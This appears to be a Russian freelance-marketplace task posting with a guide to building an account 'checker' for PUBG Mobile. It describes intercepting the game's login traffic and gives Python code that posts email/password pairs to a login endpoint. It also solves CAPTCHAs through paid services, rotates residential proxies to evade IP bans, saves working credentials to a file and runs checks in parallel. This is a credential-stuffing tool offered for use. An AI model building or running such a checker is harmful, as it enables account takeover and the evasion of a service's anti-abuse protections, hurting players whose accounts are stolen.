Реализовать чекер

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Создание чекера для PUBG Mobile — сложная задача, требующая знаний в программировании, сетевой безопасности и понимания работы с API. Для создания рабочего чекера вы должны пройти несколько этапов: от изучения протоколов запросов игры до написания кода. Вот подробное руководство:

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1. Изучите принципы работы игры

Перед созданием чекера вам нужно понять, как PUBG Mobile взаимодействует с серверами:

Что происходит при авторизации (логин)?

Какие данные (email, пароль, токен) отправляются?

Как сервер отвечает (успешный вход, ошибки)?

Используйте прокси для анализа трафика игры. См. следующий шаг.

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2. Анализ сетевого трафика

Чтобы понять, какие запросы отправляет клиент игры:

1. Инструменты для перехвата запросов:

Fiddler: Для анализа HTTP/HTTPS-трафика.

Burp Suite: Мощный инструмент для сетевого анализа.

Wireshark: Для анализа сетевых пакетов.

2. Настройка:

Настройте прокси на своем устройстве (например, эмуляторе Android, таком как BlueStacks или NoxPlayer).

Установите сертификат доверия, чтобы перехватывать HTTPS-запросы.

Запустите игру и выполните вход через email и пароль.

3. Соберите данные:

Перехватите URL, на который отправляется запрос на вход.

Изучите параметры запроса и заголовки (например, Authorization, User-Agent).

Сохраните успешные ответы, которые возвращают информацию об аккаунте.

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3. Напишите код для отправки запросов

Используйте Python (или другой язык) для автоматизации запросов:

import requests

url = "https://igame.msdkpass.com/account/login"  # URL для авторизации

headers = {

    "Content-Type": "application/json",

    "User-Agent": "Dalvik/2.1.0 (Linux; U; Android 10; SM-G973F Build/QP1A.190711.020)"

}

data = {

    "account": "your_email",  # Email аккаунта

    "password": "hashed_password",  # Пароль (может быть хэшем MD5/SHA1)

    "token": "your_token"  # Дополнительные токены

}

response = requests.post(url, headers=headers, json=data)

if response.status_code == 200:

    print("Успешный вход:", response.json())

else:

    print(f"Ошибка {response.status_code}: {response.text}")

---

4. Работа с CAPTCHA

PUBG Mobile может использовать CAPTCHA для защиты аккаунтов. Если чекер сталкивается с CAPTCHA:

1. Используйте API решений CAPTCHA:

2Captcha, AntiCaptcha, или CapMonster.

2. Интегрируйте в чекер отправку CAPTCHA на сервис для решения.

Пример интеграции CapMonster:

capmonster_api_key = "your_api_key"

def solve_captcha(captcha_image):

    response = requests.post(

        "https://api.capmonster.cloud/createTask",

        json={

            "clientKey": capmonster_api_key,

            "task": {

                "type": "ImageToTextTask",

                "body": captcha_image

            }

        }

    )

    task_id = response.json().get("taskId")

    while True:

        time.sleep(5)

        result = requests.post(

            "https://api.capmonster.cloud/getTaskResult",

            json={"clientKey": capmonster_api_key, "taskId": task_id}

        )

        if result.json().get("status") == "ready":

            return result.json()["solution"]["text"]

---

5. Использование прокси

Для предотвращения бана IP:

Подключите поддержку прокси-серверов.

Используйте мобильные или резидентные прокси:

Soax, SmartProxy, PacketStream.

Ротация прокси для каждого запроса:

proxy = {

    "http": "http://username:password@proxy_ip:proxy_port",

    "https": "http://username:password@proxy_ip:proxy_port"

}

response = requests.post(url, headers=headers, json=data, proxies=proxy)

---

6. Проверка валидности аккаунта

После успешного входа:

1. Сделайте запрос к API, чтобы получить данные об аккаунте (ник, ID).

2. Сохраните данные в файл:

with open("valid_accounts.txt", "a") as file:

    file.write(f"{email}:{password}:{nickname}:{user_id}\n")

---

7. Пример структуры чекера

Вот пример полной структуры чекера:

1. Модули:

Авторизация.

Работа с CAPTCHA.

Подключение прокси.

Сохранение результатов.

2. Параллельность: Используйте threading или asyncio для одновременной проверки множества аккаунтов.

PythonНаписание скриптовРазработка программ
5 месяцев назад
guest_1733825498725
5 месяцев в сервисе
Был
5 месяцев назад

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Денис
 
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9 лет в сервисе
Был
4 часа назад
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5 месяцев назад